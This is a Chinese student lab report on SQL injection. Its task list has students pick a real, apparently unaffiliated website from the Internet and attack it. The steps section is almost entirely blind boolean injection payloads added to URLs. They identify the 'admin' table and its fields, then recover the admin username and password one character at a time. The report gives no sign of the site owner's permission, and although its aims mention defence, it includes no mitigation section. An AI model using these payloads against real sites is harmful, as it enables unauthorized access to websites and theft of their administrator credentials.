SQL注入攻击实验报告

SQL
注
入
攻
击
报
告
院系：计算机与通信工程学院
班级：信息安全10-02班
实验目的
通过SQL注入攻击，掌握网站的工作机制，认识到SQL注入攻击的防范措施，加强对Web 攻击的防范。

1.实验内容
通过模拟SQL注入攻击获得某网站后台登陆密码。

（1）端正学习目的，禁止恶意入侵，不可对他人网站造成不良影响。

（2）寻找Internet上用ASP、PHP、JSP或者语言编写的动态网站，测试其是否存在SQL 注入漏洞，选择一个可能存在漏洞的网站进行模拟攻击。

（3）获得后台数据库中的存储网站用户和密码的数据表。

（4）获得其中一对用户名和密码。

（5）找到登陆后台系统的网页路径，用获得的用户名和密码验证是否能登陆。

（6）为这个网站的SQL注入漏洞提出解决方案和防范办法。

3.实验步骤
解攻击方法
在地址栏： and 1=1
查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误，继续假设这个站的数据库存在一个admin表
在地址栏： and 0<>(select count(*) from admin)
返回页正常,假设成立了。

下面来猜猜看一下管理员表里面有几个管理员ID：
and 1<(select count(*) from admin)
页面什么都没有。

管理员的数量等于或者小于1个
and 1=(select count(*) from admin)
输入=1没显示错误，说明此站点只有一个管理员。

下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。

and 1=(select count(*) from admin where len(username)>0)
用户名称字段猜解完成之后继续猜解密码字段
and 1=(select count(*) from admin where len(password)>0)
password 字段存在！
我们已经知道了管理员表里面有3个字段 id,user,password。

id 编号
user 用户名
password 密码
下面继续的就是管理员用户名和密码的猜解了。

先猜出长度!
and 1=(select count(*) from admin where len(user)<10)
user 字段长度小于10
and 1=(select count(*) from admin where len(user)<5)
user 字段长度不小于5
慢慢的来,最后猜出长度等于6,请看下面,返回正常就说明猜解正确
and 1=(select count(*) from admin where len(user)=6)
下面猜密码,
and 1=(select count(*) from admin where len(password)=10)
猜出来密码10位,不要奇怪,现在网管都有防备的,所以密码上20位也不太奇怪了
下面该做的就是把他们拆开来一个一个猜字母
and 1=(select count(*) from admin where left(user,1)=a)
返回正常，第一位字母等于a,千万不要把大写和小写给搞错了哦~~呵呵,如果不a就继续猜其他的字符落,反正猜到返回正常就算OK了
开始猜解帐号的第二位字符。

and 1=(select count(*) from admin where left(user,2)=ad)
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
接着是10位密码
and 1=(select count(*) from admin where left(password,1)=a)
经过无数次错误之后......
and 1=(select count(*) from admin where
left(password,10)=administra)
结果密码是administra。